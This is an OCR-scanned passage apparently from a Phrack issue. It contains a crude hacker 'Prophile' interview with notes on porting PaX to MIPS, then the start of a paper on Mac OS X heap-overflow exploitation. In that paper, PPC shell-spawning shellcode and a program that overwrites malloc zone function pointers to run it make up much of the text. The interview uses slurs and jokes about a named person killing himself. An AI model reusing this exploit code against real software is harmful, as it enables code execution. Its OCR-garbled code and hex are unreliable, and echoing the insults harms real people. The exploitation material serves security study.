between themselves. How are Montmartre and Montparnasse nowadays? 


Q: Who are your heroes of computer security, and why? 

A: I have many, serio -- and I’m a lucky bastard for being able to 
meet/know many of them. But what difference would it really make if I 
told you? The heroes are mine, the fucking myths are mine. 


Can I make a question myself? kthx. 


Q: Coxinhatguarana or Exchange 0-day? 
A: 


Q: How do you define the term "hacker"? 

A: I believe symbolic references determine a "fact". A linguistic 
representation of someone’s type of reality, at certain time. As the 
Being of that being changes, so does its perception about that fact. 
When beings as such, or even as Nothing, interact, entropy increases 
and the fact tends to get more deformed. The technicism helps the 
process, as information media get more powerful and globally spread. 
Consumate Nihilism. I believe. 


Q: Come on, ‘fess up. You’re brazillian after all, so name all the 
sites you’ve defaced. 


Q: If you were having sex with route, would you be the top or bottom? 
A: I would try both. I would try others. Though I would really just be 
interested in the muscles, tattoos and guns :D 


Q.1: We hear you’re the guy who schooled pageexec@freemail.hu on Pax. 
Is this true? Explain. 

Q.2: What was your motivation in porting PaX to MIPS, what were the 
biggest problems you encountered and how did you resolve them? 

A: Schooled? I don’t think so :>. There is this story about the 
impossibility of PAGEEXEC on MIPS based computers, initiated by the 
great Theoretical de Raadt {[1],[2]}. 

Motivation: I simply thought it would be fun to try to prove it wrong 
and started playing around. In the end, I just found out I was the 
wrong one. For now at least :> 


[Warning] 


I’d like to advise that I’m DRUNK, at Bulas’s, having a great party in 
the name of Tango’s bday: happy bday, Tango!!! No aids, bro ;> just 
beerz and cheerz! 
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[First approach] 


Trying to play with caching system. Failed. 


[From Linux-MIPS mailing list] 


"PAX can’t be fully supported on MIPS anyway; the architecture doesn’t 
have a no-exec flag in it’s pages. PAX docs are bullshit btw. 
execution proection doesn’t require a split TLB and anyway, the MIPS 
uTLBs are split." -- Ralf 


[Response] (despite the fact that Ralf, one of my fancy germans, missed 
the entire point of the PaX project) 


I see that MIPS has split TLB’s, which can not be distinguished by 
software level, in another hand. Thus when a page-fault occours I don’t 
see how a piece of (non-microcoded) exception handler can get aware 
whether the I-Fetch is being done in original ‘‘code area’’ or as an 
attempt to execute injected payload in a memory area supposed to carry 
only readable/writeable data. Plus the fact that JTLB holds references 
to data and code together in the address translation cache. Plus 
situations like ksegO and ksegl unmaped translations, which would 
occour outside of any TLB (having virtual address subtracted by 
Ox80000000 and OxA0000000 respectively to get physiscal locations) 
making, as you mentioned, only split uTLB’s (not counting kseg2 special 
case). But PaX wants to take care of kernel level security too. 

Even MIPS split cache unities (which can be probed separately by 
software) wouldn’t make the approach possible since if you have a piece 
of data previously cached in D-Cache (load/store) the cache line would 
need to suffer an invalidation and the context to be saved in the 
I-Cache before the I-Fetch pipe stage succeeds. 


Indeed, execution protection (in a general way) does not require split 
TLB. Other solutions designed and implemented by PaX are SEGMEXEC 
(using specific segmentation features of x86 basead core’s) and 
MPROTECT. The last one uses vm_flags to control every memory mapping’s 
state, ensuring that these never hold VM_WRITE | VM_MAYWRITE together 
with VM_EXEC | VM_MAYEXEC. But as the solution becomes more complex it 
also tends to get more issues. First of all, this wouldn’t be as simple 
and ‘‘automatic’’ as per page control. Another point is that this 
solution wouldn’t prevent kernel level attacks so, among others, any 
compromise in this level could lead to direct manipulation of a task’s 
mappings flags. At the end a known problem is an attacker who is able 
to write to the filesystem and to request this file to be mapped in 
memory as PROT_EXEC. In other words: yes it is possible to achieve 
execution protection in other ways, but not as precise as page-level. 


[Second approach] 

"Plus the fact that JTLB holds references to data and code together in 
the address translation cache." went from a problem to a solution, when 
discussing it to PaX team. 

The quote: 

"Multiple Matches: If more than one entry in the TLB matches the 


virtual address being translated, the operation is undefined." -- from 
[3% 


The algorithm: 


—- from the Refill exception handler, check fetching type { 
* EPC = EPC; 
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* if CPO(Cause(BD)) [ 


_EPC += 4; 

] 

* compare ( CPO(_EPC) , CPO(BadVaddr) ) [ 
if TRUE ( I-Fetch ); 
else ( D-Fetch ); 

] 

* T-Fetch [ 


build the valid PTE and load it normally in the J-TLB; 


* D-Fetch [ 
build a valid PTE and load it in the J-TLB; 
force it to be loaded in our lovely entry in the D-TLB ( 


—_asm__ __volatile ("lw %0,0(%1)"\ 
"=r" (user_data) \ 
ieee (address) ); 


build an invalid PTE, for the same ASID/VPN, marked by Pax ( 


static inline pte_t pte_mkpax(pte_t pte) 
{ 


pte_val (pte) &= ~ (_PAGE_READ|_PAGE_STLENT_READ|_PAGE_DIRTY) ; 


} 


load the invalid entry in the J-TLB 


The conjecture: 


If a I-Fetch happens to that (previously marked by PaX) page, the 
circuit’s TLB sorting algorithm should take the invalidated entry from 
J-TLB, load it within the I-TLB and generate a second page fault by 
trying to make use of this entry. 


-— from the Refill exception handler, check fetching type { 
eB PC -=-EPRG; 


* if CPO(Cause(BD)) [ 


_EPC += 4; 
] 
* compare ( CPO(_EPC) , CPO(BadVaddr) ) [ 
if TRUE ( F-Fetch: ); 
else ( D-Fetch ); 
] 
* T-Fetch [ 
for PaX marked pages ( 
pax_report_fault(...); 


do_exit (SIGKILL) ; 


for non PaX pages, build the valid PTE and load it normally 
in the J-TLB; 


[The experiment ] 


The computer: 


H 


DT 79RV4600-100, 128MB of RAM. 


Executive code { 
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- Dump the Translation Lookaside Buffer 


* play with CPO (Index); 
* play with CPO(EntryLo)’s flags; 
* play with CPO (Wired) ; 


* look for patterns; 


} 


The user code: 


#include <stdio.h> 
#include <unistd.h> 
#include <stdlib.h> 
#include <fcntl.h> 
#include <sys/mman.h> 
#include <asm/page.h> 


const unsigned long payload[] = { 0x03e00008, 


int 


main(int argc, char **argv) 


{ 


unsigned long page, 


vpn; 
void *vaddr; 
int AAO Res 


/* mmap itself won’t load/store the page, 


/* jr $31 ; nop 


ntries to disk { 


2 


Ox00000000 }; 


which means a virgin 


* place so we can be the fault’s EPC. 
*/ 
if (argv[1]) { 
fd = open(argv[1],O_RDWR) ; 
vaddr = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRIT 
MAP_PRIVATE, fd, 0); 


} else { 


/* malloc’s internals stores then loads somewhere in 
* the page range, it will generate our fault. 


«ff 


This is ridiculous, 


—> brk 


PROT_R 


oR OR a BEL aR aR Ps OR SE OR Se 78h) 2k 


/ 


does brk (PAG 


(0x10001000 + (PAG 


but MIPS glibc’s 
E SIZE * 33) even if you 
just want to malloc(few bytes), 


If malloc requested siz 


vaddr = malloc 


memcpy (vaddr, 


page = ((unsigned 
vpn = ((unsigned 


long) 
long) 


(void *) 


EAD |PROT_WRITE, MAP_PRIVATI 


(instead of 33) 


(33 * PAGE_SIZE); 


vaddr & (PAGE _| 
vaddr & (PAGE_| 


payload, 8); 


to 


)) 


normally you get: 
E SIZE * 33 


> 33 pages then it old_mmap 
E | MAP_ANONYMOUS 


Even funnier cause as far as I can tell glibc 
assumes size >= 32 
get_unmapped_area.... 


then 


Thinking about the whole MIPS architecute i can’t 
think of anything that could justify this crap. 
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printf ("Payload @ $081x\n", (unsigned long) vaddr); 


printf ("CPO_BADVADDR 


/* I-Fetch vaddr */ 


asm ( 


i 


Mayet 


return 


[The results] 


Patterns: 


No pattern. 
interface. 


S081x [VPN = %081x]\n\n", (paget+8), vpn); 


"or $8,$2,$3\n" 

"Salr $8\n" 

(page), "xr" (((unsigned long) vaddr & ~ (PAGE_MASK) ) ) 
page; 


Sorting algorithm seems undecidable from the software 


—- Output example 
surreal kernel: ###H#HEEEE EEE HEHEHE HERE EE EE EE EE HEH EE HE EHH HH EE EE EE EE HE HEH 
surreal kernel: [do_page_fault] : Program : Hello [3218] 
surreal kernel: [do_page_fault] : CPO_BADVADDR : 2aac3004 
surreal kernel: [do_page_fault] : EPC : 2ab90928 
surreal kernel > TLBS Exception (LO00ffdb) 
surreal kernel 
surreal kernel [BEFORE] 
surreal kernel __update_tlb] : Program : Hello [3218] 
surreal kernel __update_tlb] : CPO_BADVADDR : 2aac3004 
surreal kernel __update_tlb ASID : 00000062 
surreal kernel __update_tlb EntryHi > 2aac2062 
surreal kernel __update_tlb EntryLo0 : 32565e 
surreal kernel __update_tlb EntryLol 5 40 
surreal kernel __update_tlb Index f 4D 
surreal kernel 
surreal kernel SSSo LEB Entrees. Saas 
surreal kernel: Index: 45 pgmask=4kb va=2aac2000 asid=62 
surreal kerne EntryLo0o [pa=0c959000 c=3 d=1 v=l1 g=0] 
surreal kernel EntryLol [pa=00000000 c=0 d=0 v=0 g=0] 
surreal kernel 
surreal kernel [AFTER] 
surreal kernel __update_tlb] : Program : Hello [3218] 
surreal kernel __update_tlb] : CPO_BADVADDR : 2aac3004 [00000000] 
surreal kernel __update_tlb ASID : 00000062 
surreal kernel __update_tlb EntryHi > 2aac2062 
surreal kernel __update_tlb EntryLo0 + 32565¢ 
surreal kernel __update_tlb EntryLol : 3297dc 
surreal kernel __update_tlb Index o 3 Aus 
surreal kernel 
surreal kernel -eoH TLR Entrves: ==> 
surreal kernel: Index: 45 pgmask=4kb va=2aac2000 asid=62 
surreal kerne EntryLo0o [pa=0c959000 c=3 d=1 v=1 g=0] 
surreal kernel EntryLol [pa=O0ca5f000 c=3 d=1 v=l1 g=0] 
surreal kernel 
surreal kernel: Index: 47 pgmask=4kb va=2aac2000 asid=62 
surreal kerne EntryLo0o [pa=0c959000 c=3 d=1 v=0 g=0] 
surreal kernel EntryLol [pa=O0ca5f000 c=3 d=1 v=0 g=0] 

} 

— Working example { 
tiago@surreal(~)$ ./Hello 

Payload @ 2aac3008 
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CPO_BADVADDR : 2aac3008 [VPN = 2aac2000] 


Killed 

tiago@surreal(~)$ uname -a 
Linux surreal 2.6.9-rc2 #125 Thu Oct 28 05:38:27 BRT 2004 mips unknown 
tiago@surreal (~)$ 


surreal kernel: ########EEEEEEEEEE EXECUTION ATTEMPT ######4¢ #4 #H# HHH H 
surreal kernel: [do_page_fault] : Program : Hello [3218] 

surreal kernel: [do_page_fault] : CPO_BADVADDR : 2aac3008 

surreal kernel: [do_page_fault] EPC : 2aac3008 


} 

-— Possible reasons { 
* timing; 
* stupidity; 


* . 
a 4 


So? Looking at some opencores.org’s projects and checking their MMU 
circuit implementations that might get me some ideas. 

Ah! Yes, BTW, if you have the HDL project of the Stanford MIPS, or any 
of its children, please hook me up -- warez. kthx. 


[1] http://www. securityfocus.com/archive/1/333303/2003-08-09/2003-08-15/2 
[2] http://cvs.openbsd.org/papers/auug04/mgp00009. html 
[3] MIPS R4000 Microprocessor’s User Manual, 2nd Ed. (p.62). 


| =[ Open Interview The real cool questions 


Q: Is the true you still entertain relation with the KIQ team? what kind 
of missions did you realised for them? 
A: I hate soccer. 


Q: How close is your personal relation with the scene whore halfdead? 
tell us about .ro/.br gangbangs... 
A: The hawk that is big? 


Q: We heard mayhem is moving to your country escaping french fascist 
laws, have you never tried ELFsh? 

A: Hrmmm, in fact it’s just a genius play from big local beuh dealers. 
Guinness? 


Q: You said 4times by the past after posting bullshit in dailydave, 
you’ll never do it again, but you are still posting. How do you live 
that addiction? Any idea why noone reading that mailing list can’t 
understand a word of your philosofical ideas? 

A: 4? I’ve said it 82 times. 

I simply don’t think of the subject, it’s like having aids and being 
concerned about it. 

Are you nuts? I know for sure I’m the only retarded capable to 
understand my symbolism ;P 


Q: Coxinhaaaaa? 
A: Bico 


Q: About philosophy, why you ended in ITS world? There are rumors about 
you talking to your computers about your philosophy and asking them to 
comment before you post in dailydave? 

A: See ’Life’. False! That’s why they suck so much. 


Q: Absynthe? 
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A: Sharks! 
Q: Did you try to put some sense to your philosofical ideas _without_ 


any absynthe effect? 
A: Bohmes, Dan Frank. <3 


Q: Does the number of ’hu’ has a signification for you? 
A: Huhuhuhuhuhu hu huhuhu 


Q: Is there any kind of relation between ‘’hu’ and ‘’uh’? 
A: Uh? Hu! 


Q: Absynthe? 
A: Spain 


Q: Rumor has it that pax team strong-armed you into being his MIPS 
bitch, any comments? 
A: :< Not fair. I almost cried because of petite pip. 


Q: How did your transition from inline skating to inline assembly come 
about? 
A: Sliding... 


Q: Which would you say has bigger scenewhores, the hacking scene or the 
X-games scene? 
A: 540 into True-spin kind grind, fake 360 out. 


Q: What does ‘hu’ actually mean? 
A: Mean? :/ 


Q: What are your opinions on finger(1) ? 
A: HUHUHUHUHU q:D 


Q: Free [RaFa] ? 
A: Sit on your feet 


Q: Do you have anything to say to all the people scuttling around 
trying to figure out who the fuck you are right now? 

A: If they’re really worried about that they should stop scuttling and 
start blubbering instead. 


Q: We would like to congratulate you on a succesful Phrack Prophile 
defacement, and actually managing to get it distributed. How _did_ you 
pull it off? 

A: I didn’t :D 


Q: Can you answer a question with a paragraph less than 20 lines long? 
A: No. 


Q: Is your love of MIPS related at all to the ’Coyote & Road Runner’ 
cartoon? 
A: "See MIPS Run"? 


Q: I heard you’re the funder of huhushmail ? Can you give us some light 
about why Security through Obscurity actually works? 

A: One of them, yes. I have to agree, though if I give you any 
enlightenment I would be breaking the conecpt. 


Q: Can you guess what will be your next answer? 
A: No, but I know the question. 


Q: Any idea why Phrack shouldn’t be renamed Phcrack? 
A: Because of current price of the blue mosquitos from Tanzania. 


Q: CRUZETROOOOOOO 
A: Chupame la pija, boludo maricon! 


Q: Which is the better backdoor? PaX or grsecurity? 
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A: To be honest, I prefer the iGOBLIN backdooring technique. 


Q: What percentage of this interview is inside humor, that the reading 
audience will never understand? 

A: 95.46008097%. I might get the graphical analysis soon, from the 
widely known LRL Lance Research Laboratory. ;) 


Q: How does it feel to be famous now? How will this Prophile change 
your life for the better? For the worse? Where can job recruiters 
contact you? 

A: I already got 83 phone calls, 68 fax messages, and 3 e-mails. 
Invitations from all the fancy elite hacker groups. I might as well 
apply to the NSA -- National Symposium of Albatri. I expect to be 
capable of decreasing brazilian poverty and DDoS attacks with this, by 
increasing the number of defacers that will bow down towards my 
fancyness. I am also looking forward to becoming friends with all the 
elite hackers and to be recognized as such. I will be beautiful, 
famous, loved -- a super hero! 

I’m welcome. 


Q: DURA? 
A: Hooray for Danny! *\o/* 


Q: What are your thoughts on Richard Johnson of iDEFENSE? 
A: Secure: never being a petit theft, he wears condoms! 


Q: Do you have any idea why Richard Johnson of iDEFENSE has not killed 
himself yet? 
A: Lack of fancyness. 


Q: Who is your favorite "hot shot hacker from Texas"? 
A: The KoolKrazyKlantastic -- fluffi leona \o/ 


=---=[ One word comments 
[give a l-word comment to each of the words on the left] 


WORD? : WORD! 


|=---=[ Any suggestions/comments/flames to the scene and/or specific people? 


This bunch of bullshit spat above meant something when done. Fuck its 
political meanings and implications, even though I cannot avoid them. 
Carry on. 


|=---=[ Shoutouts & Greetings 


I don’t believe in merit. To do is as arbitrary as to not do. 


However, I want to HUG some people; 

my family, my stag, my limey brother, my tukey, my albatross, my 
creyss, my frogs, my dutchies, my hungarian, the only guy who’s hotter 
than the old apartment, my dot-pa-marine, my waismo, my joto, faggy, 

my fancy blackhat white american, my kurdish, my corcho, my sweedish, 
my boss, my tempest individuals, my metrosexual linguistic analystic 
K-master giant, my iGOBLIN defender grin, my tibu, and AAALLLL my fancy 
collection of fancy individuals! 


|=[ EOF ] 
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--{ 1 - Introduction. 


This article comes as a result of my experiences exploiting a heap 
overflow in the default web browser (Safari) on Mac OS X. It assumes a 
small amount of knowledge of PPC assembly. A reference for this has 

been provided in the references section below. (4). Also, knowledge of 
other memory allocators will come in useful, however it’s not necessarily 
needed. All code in this paper was compiled and tested on Mac OS X - 
Tiger (10.4) running on PPC32 (power pc) architecture. 


[ 2 Overview of the Apple OS X userland heap implementation. 


The malloc() implementation found in Apple’s Libc-391 and earlier (at the 
time of writing this) is written by Bertrand Serlet. It is a relatively 
complex memory allocator made up of memory "zones", which are variable 
size portions of virtual memory, and "blocks", which are allocated from 
within these zones. It is possible to have multiple zones, however most 
applications tend to stick to just using the default zone. 


So far this memory allocator is used in all releases of OS X so far. It 
is also used by the Open Darwin project [8] on x86 architecture, however 
this isn’t covered in the paper. 


The source for the implementation of the Apple malloc() is available from 
6]. (The current version of the source at the time of writing this is 
10.4.1). 


[To access it you need to be a member of the ADC, which is free to sign up. 
(or if you can’t be bothered signing up use the login/password from 
Bug Me Not [7] ;) 


----[ 2.1 - Environment Variables. 


A series of environment variables can be set, to modify the behavior of 
the memory allocation functions. These can be seen by setting the 
"MallocHelp" variable, and then calling the malloc() function. They are 
also shown in the malloc() manpage. 


We will now look at the variables which are of the most use to us when 
exploiting an overflow. 


[ MallocStackLogging ] -:- When this variable is set a record is kept of 
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all the malloc operations that occur. With this variable set the "leaks" 
tool can be used to search a processes memory for malloc()’ed buffers 
which are unreferenced. 


[ MallocStackLoggingNoCompact ] -:- When this variable is set, the record 
of malloc operation is kept in a manner in which the "malloc_history" 
tool is able to parse. The malloc_history tool is used to list the 
allocations and deallocations which have been performed by the process. 


[ MallocPreScribble ] -:- This environment variable, can be used to fill 
memory which has been allocated with Oxaa. This can be useful to easily 
Ss where buffers are located in memory. It can also be useful when 


scripting gdb to investigate the heap. 
[ MallocScribble ] -:- This variable is used to fill de-allocated 
memory with 0x55. This, like MallocPreScribble is useful for 
making it easier to inspect the memory layout. Also this will make 

a program more likely to crash when it’s accessing data it’s not supposed 
to. 


[ MallocBadFreeAbort ] -:- This variable causes a SIGABRT to be sent to 
the program when a pointer is passed to free() which is not listed as 
allocated. This can be useful to halt execution at the exact point an 
error occurred in order to assess what has happened. 


NOTE: The "heap" tool can be used to inspect the current heap of a 
process the Zones are displayed as well as any objects which are 
currently allocated. This tool can be used without setting an 
environment variable. 


----[ 2.2 - Zones. 


A single zone can be thought of a single heap. When the zone is destroyed 
all the blocks allocated within it are free()’ed. Zones allow blocks with 
Similar attributes to be placed together. The zone itself is described by 
a malloc_zone_t struct (defined in /usr/include/malloc.h) which is shown 

below: 


[malloc_zone_t struct] 
typedef struct _malloc_zone_t { 


/* Only zone implementors should depend on the layout of this 


structure; Regular callers should use the access functions below */ 
void *reservedl; /* RESERVED FOR CFAllocator DO NOT USE */ 
void *reserved?2; /* RESERVED FOR CFAllocator DO NOT USE */ 
size t (*size) (struct _malloc_zone_t *zone, const void *ptr); 
void *(*malloc) (struct _malloc_zone_t *zone, size_t size); 
void *(*xcalloc) (struct _malloc_zone_t *zone, size_t num_items, 
size_t size); 
void *(*valloc) (struct _malloc_zone_t *zone, size_t size); 
void (*free) (struct _malloc_zone_t *zone, void *ptr); 
void *(*realloc) (struct _malloc_zone_t *zone, void *ptr, 
size_t size); 
void (*destroy) (struct _malloc_zone_t *zone); 
const char *zone_name; 
/* Optional batch callbacks; these may be NULL */ 
unsigned (*batch_malloc) (struct _malloc_zone_t *zone, size_t size, 
void **results, unsigned num_requested) ; 

void (*batch_free) (struct _malloc_zone_t *zone, 

void **to_be_freed, unsigned num_to_be_freed) ; 
struct malloc_introspection_t *introspect; 
unsigned version; 


} malloc_zone_t; 


(Well, technically zones are scalable szone_t structs, however the first 
element of a szone_t struct consists of a malloc_zone_t struct. This 
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struct is the most important for us to be familiar with to exploit heap 
bugs using the method shown in this paper.) 


As you can see, the zone struct contains function pointers for each of the 
memory allocation / deallocation functions. This should give you a 
pretty good idea of how we can control execution after an overflow. 


Most of these functions are pretty self explanatory, the malloc,calloc, 
valloc free, and realloc function pointers perform the same 
functionality they do on Linux/BSD. 


The size function is used to return the size of the memory allocated. The 
destroy() function is used to destroy th ntire zone and free all memory 
allocated in it. 


The batch_malloc and batch_free functions to the best of my understanding 
are used to allocate (or deallocate) several blocks of the same size. 


NOTE: 

The malloc_good_size() function is used to return the size of the buffer 
after rounding has occurred. An interesting note about this function is 
that it contains the same wrap mentioned in 5.1. 


printf ("0x%x\n",malloc_good_size (Oxffffffff) ); 
Will print 0x1000 on Mac OS X 10.4 (Tiger). 
=== 223:-— Blocks: 
Allocation of blocks occurs in different ways depending on the size of the 
memory © quired. The size of all blocks allocated is always paragraph 


aligned (a multiple of 16). Therefore an allocation of less than 16 will 
always return 16, an allocation of 20 will return 32, etc. 


The szone_t struct contains two pointers, for tiny and small block 
allocation. These are shown below: 


tiny_region_t *tiny_regions; 
small_region_t *small_regions; 


Memory allocations which are less than around 500 bytes in size 

fall into the "tiny" range. These allocations are allocated from a 

pool of vm_allocate()’ed regions of memory. Each of these regions 
consists of a 1MB, (in 32-bit mode), or 2MB, (in 64-bit mode) heap. 
Following this is some meta-data about the region. Regions are ordered 
by ascending block size. When memory is deallocated it is added back to 
the pool. 


Free blocks contain the following meta-data: 


(all fields are sizeof(void *) in size, except for "size" which is 
sizeof (u_short)). Tiny sized buffers are instead aligned to 0x10 bytes) 


—- checksum 
— previous 
- next 
-— size 


The size field contains the quantum count for the region. A quantum represents 
the size of the allocated blocks of memory within the region. 


Allocations of which size falls in the range between 500 bytes and four 
virtual pages in size (0x4000) fall into the "small" category. 

Memory allocations of "small" range sized blocks, are allocated from a 
pool of small regions, pointed to by the "small_regions" pointer in the 
szone_t struct. Again this memory is pre-allocated with the vm_allocate() 
function. Each "small" region consists of an 8MB heap, followed by the 
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same meta-data as tiny regions. 
Tiny and small allocations are not always guaranteed to be page aligned. 


If a block is allocated which is less than a single virtual page size then 
obviously the block cannot be aligned to a page. 


Large block allocations (allocations over four vm pages in size), are 
handled quite differently to the small and tiny blocks. When a large 
block is requested, the malloc() routine uses vm_allocate() to obtain the 
memory required. Larger memory allocations occur in the higher memory of 
the heap. This is useful in the "destroying the heap" technique, outlined 
in this paper. Large blocks of memory are allocated in multiples of 4096. 
This is the size of a virtual memory page. Because of this, large memory 
allocations are always guaranteed to be page-aligned. 


----[ 2.4 - Heap initialization. 
As you can see below, the malloc() function is merely a wrapper around 
the malloc_zone_malloc() function. 


void *malloc(size_t size) 


{ 


void *retval; 


retval = malloc_zone_malloc(inline_malloc_default_zone(), size); 
if (retval == NULL) 
{ 


errno = ENOMEM; 


} 


return retval; 


} 


It uses the inline_malloc_default_zone() function to pass the appropriate 
zone to malloc_zone_malloc(). If malloc() is being called for the first 
time the inline_malloc_default_zone() function calls _malloc_initialize() 


in order to create the initial default malloc zone. 


The malloc_create_zone() function is called with the values (0,0) being 
passed in as as the start_size and flags parameters. 


After this the environment variables are read in (any beginning with 
"Malloc"), and parsed in order to set the appropriate flags. 


It then calls the create_scalable_zone() function in the scalable_malloc.c 
file. This function is really responsible for creating the szone_t struct. 
It uses the allocate_pages() function as shown below. 


szone = allocate_pages (NULL, SMALL _REGION_SIZE, SMALL _BLOCKS_ALIGN, 0, \ 
VM_MAKE_TAG (VM_MEMORY_MALLOC) ) ; 


This, in turn, uses the mach_vm_allocate() mach syscall to allocate the 
required memory to store the s_zone_t default struct. 


-—[Summary]: 


For the technique contained within this paper, the most important things 
to note is that a szone_t struct is set up in memory. The struct contains 
several function pointers which are used to store the address of each of 
the appropriate allocation and deallocation functions. When a block of 
memory is allocated which falls into the "large" category, the 
vm_allocate() mach syscall is used to allocate the memory for this. 


--[ 3 - A Sample Overflow 


Before we look at how to exploit a heap overflow, we will first analyze 
how the initial zone struct is laid out in the memory of a running 
process. 
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To do this we will use gdb to debug a small sample program. This is 


shown below: 


—[nemo@gir:~]$ cat > mtstl.c 
include <stdlib.h> 


int main(int ac, char **av) 


char *a = malloc(10); 
__asm("trap"); 
char *b = malloc(10); 


} 


—[nemo@gir:~]$ gcc mtstl.c -o mtstl 
-[nemo@gir:~]$ gdb ./mtst1 
GNU gdb 6.1-20040303 (Apple version gdb-413) 


(gdb) xr 
Starting program: /Users/nemo/mtst1l 
Reading symbols for shared libraries . done 


Once we receive a SIGTRAP signal and return to the gdb command shell we 
can then use the command shown below to locate our initial szone_t 
structure in the process memory. 


(gdb) x/x &initial_malloc_zones 
0xa0010414 <initial_malloc_zones>: 0x01800000 


This value, as expected inside gdb, is shown to be 0x01800000. 
If we dump memory at this location, we can see each of the fields in the 
_malloc_zone_t_ struct as expected. 


NOTE: Output reformatted for more clarity. 


(gdb) x/x (long*) initial_malloc_zones 


0x1800000: 0x00000000 // Reservedl. 

0x1800004: 0x00000000 // Reserved2. 

0x1800008: 0x90005e0c // size() pointer. 

0x180000c: 0x90003abc // malloc() pointer. 

Ox1800010: 0x90008bc4 // calloc() pointer. 

0x1800014: 0x9004a9f8 // valloc() pointer. 

0x1800018: 0x900060ac // free() pointer. 

0x180001c: 0x90017£90 // rvrealloc() pointer. 

0x1800020: 0x9010efb8 // destroy() pointer. 

0x1800024: 0x00300000 // Zone Name 

//("DefaultMallocZone"). 

0x1800028: 0x9010dbe8 // batch_malloc() pointer. 

0x180002c: 0x9010e848 // batch_free() pointer. 
In this struct we can see each of the function pointers which are called 
for each of the memory allocation/deallocation functions performed using 
the default zone. As well as a pointer to the name of the zone, which can 
be useful for debugging. 


If we change the malloc() function pointer, and continue our sample 
program (shown below) we can see that the second call to malloc() results 
in a jump to the specified value. (after instruction alignment). 


(gdb) set *0x180000c = Oxdeadbeef 
(gdb) jump *(S$pc + 4) 
Continuing at Ox2cf8. 


Program received signal EXC_BAD_ACCESS, Could not access memory. 
Reason: KERN_INVALID_ADDRESS at address: Oxdeadbeec 

Oxdeadbeec in ?? () 

(gdb) 


But is it really feasible to write all the way to the address 0x1800000? 
(or 0x2800000 outside of gdb). We will look into this now. 
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First we will check the addresses various sized memory allocations are 
given. The location of each buffer is dependant on whether the 
allocation size falls into one of the various sized bins mentioned 
earlier (tiny, small or large). 


To test the location of each of these we can simply compile and run the 
following small c program as shown: 


—[nemo@gir:~]$ cat > mtst2.c 


include <stdio.h> 
include <stdlib.h> 


int main(int ac, char **av) 


extern *malloc_zones; 


printf ("initial_malloc_zones @ 0x%x\n", *malloc_zones) ; 
printf("tiny: *%p\n",malloc(22)); 

printf("small: @p\n",malloc(500)); 

printf("large: sp\n",malloc(Oxffffffff) ); 


return 0; 
} 
—[nemo@gir:~]$ gcc mtst2.c -o mtst2 
-[nemo@gir:~]$ ./mtst2 
initial_malloc_zones @ 0x2800000 
tiny: 0x500160 
small: 0x2800600 
large: 0x26000 


From the output of this program we can see that it is only possible to 
write to the initial_malloc_zones struct from a "tiny" or " large" 

buffer. Also, in order to overwrite the function pointers contained within 
this struct we need to write a considerable amount of data completely 
destroying sections of the zone. Thankfully many situations exist in 
typical software which allow these criteria to be met. This is discussed 
in the final section of this paper. 


Now we understand the layout of the heap a little better, we can use a 
small sample program to overwrite the function pointers contained in the 
struct to get a shell. 


The following program allocates a ‘tiny’ buffer of 22 bytes. It then uses 
memset () to write ’A’s all the way to the pointer for malloc() in the 
zone struct, before calling malloc(). 


include <stdio.h> 
include <stdlib.h> 
include <string.h> 


int main(int ac, char **av) 


extern *malloc_zones; 
char *tmp,*tinyp = malloc(22); 


printf("[+] tinyp is @ %p\n",tinyp); 
printf("{+] initial_malloc_zones is @ %p\n", *malloc_zones) ; 
printf("[+] Copying 0x%x bytes.\n", 
(((char *)*malloc_zones + 16) - (char *)tinyp)); 
memset (tinyp,’A’, (int) (((char *)*malloc_zones + 16) - (char *)tinyp)); 


tmp = malloc (Oxdeadbeef) ; 
return 0; 


} 


However when we compile and run this program, an EXC_BAD_ACCESS signal is 
received. 
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(gdb) xr 
Starting program: /Users/nemo/mtst3 
Reading symbols for shared libraries . done 


al 


+] tinyp is @ 0x300120 
+] initial_malloc_zones is @ 0x1800000 
+] Copying Oxl4ffef0O bytes. 


eal 


el 


Program received signal EXC_BAD_ACCESS, Could not access memory. 
Reason: KERN_INVALID_ADDRESS at address: 0x00405000 
Oxffff9068 in memset_pattern () 


This is due to the fact that, in between the tinyp pointer and the malloc 
function pointer we are trying to overwrite there is some unmapped memory. 


In order to get past this we can use the fact that blocks of memory 
allocated which fall into the "large" category are allocated using the 
mach vm_allocate() syscall. 


If we can get enough memory to be allocated in the large classification, 
before the overflow occurs we should have a clear path to the pointer. 


o illustrate this point, we can use the following code: 


include <stdio.h> 
include <stdlib.h> 
include <malloc.h> 
include <string.h> 


char shellcode[] = // Shellcode by b-r00t, modified by nemo. 
"\x7c\x63\xla\x79\x40\x82\xff£\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4" 
"\x44\xff£\xf£\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xf£\xf£\x02" 
"\x60\x60\x60\x60\x7C\xa5\x2a\x79\x7C\xX68\x02\xab6\x38\x63\x01\x60" 
"\x38\x63\xfe\xf4\x90\x61\xf£\xf£8\x90\xal\xf£\xfc\x38\x81\xff£\xf8" 
"\x3b\xc0\x01\x47\x38\xle\xfe\xf4\x44\xf£\xf£\x02\x7c\xa3\x2b\x78" 
"\x3b\xc0\x01\x0d\x38\xle\xfe\xf4\x44\xf£\xf£\x02\x2£\x62\x69\x6e" 
"\x2£\x73\x68"; 


extern *malloc_zones; 

int main(int ac, char **av) 
{ 

char *tmp, *tmpr; 

int a=0 , *addr; 


while ((tmpr = malloc(Oxffffffff)) <= (char *)*malloc_zones) ; 


// small buffer 


addr = malloc(22); 
printf("{+] malloc_zones (first zone) @ Ox%x\n", *malloc_zones) ; 
printf("{+] addr @ 0Ox%x\n",addr) ; 


if ((unsigned int) addr < *malloc_zones) 
{ 
printf("({+] addr + %u = Ox%x\n", 
*malloc_zones —- (int) addr, *malloc_zones); 
exit(1); 


printf("{+] Using shellcode @ 0x%x\n", &shellcode) ; 


for (a = 0; 
a <= ((*malloc_zones - (int) addr) + sizeof(malloc_zone_t)) / 4; 
att) 
addr[a] = (int) &shellcode[0]; 
print£("({+] finished memcpy ()\n"); 


tmp = malloc(5); // execve() 
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aS 


This code allocates enough "large" blocks of memory (Oxffffffff) with 
which to plow a clear path to the function pointers. It then copies 

the address of the shellcode into memory all the way through the zone 
before overwriting the function pointers in the szone_t struct. Finally a 
call to malloc() is made in order to trigger the execution of the 
shellcode. 


> 


Ss you can see below, this code function as we’d expect and our 
shellcode is executed. 


nemo@gir:~]$ ./heaptst 

+] malloc_zones (first zone) @ 0x2800000 
+] addr @ 0x500120 

+] addr + 36699872 = 0x2800000 

